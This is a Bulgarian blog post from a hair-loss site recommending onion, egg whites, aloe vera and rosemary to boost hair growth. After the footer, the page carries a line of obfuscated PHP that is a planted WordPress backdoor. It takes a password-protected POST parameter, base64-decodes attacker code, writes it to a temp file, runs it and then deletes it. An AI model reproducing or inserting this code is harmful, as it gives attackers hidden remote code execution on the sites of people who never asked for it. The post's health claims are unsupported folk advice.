Няколко лесни и бързи решения за засилване растежа на косата | Косопад

Няколко лесни и бързи решения за засилване растежа на косата

kosa-maia

За да имаме красива и здрава коса, понякога е необходимо съвсем малко, а правилното решение се оказва, че буквално ни е под ръка.

Ако забележим, че косата ни е спряла да расте от известно време, може да я подхраним с някое природно средство.

Ето няколко лесни рецепти, които се приготвят от лесно достъпни и евтини храни или растения:

1. Лук. Може да не ни харесва как косата мирише от него, но е сред най- ефективните решения за подсилване на растежа й. Въздейства върху космените фоликули, като ги подсилва. Достатъчно е само да нарежем глава лук на ситно и да добавим парченцата към шампоана.

kosopad-luk-2

2. Белтъци. Яйцата са изключително богати на протеини. Можем да използваме белтъците като маска преди миене. По този начин подсилваме чрез протеините косъма и помага за растежа му.

3. Алое вера. Растението има множество свойства, сред които и много ползи за косата. Прави я силна, блестяща и здрава, а също спомага и за растежа й. Трябва ни само меката вътрешна част от листото, която накисваме във вода от предходната вечер и нанасяме по време на миене.

4. Розмарин. Това растение, което използваме в кухнята като подправка, е изключително полезно за косата. Въздейства върху корените на косата, като подобрява кръвообращението, което спомага за растежа на косъма. Можем да използваме розмарина като го комбинираме с мед или като го накълцаме и го сложим в шампоана.

07. юли 2017 12:38:05 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}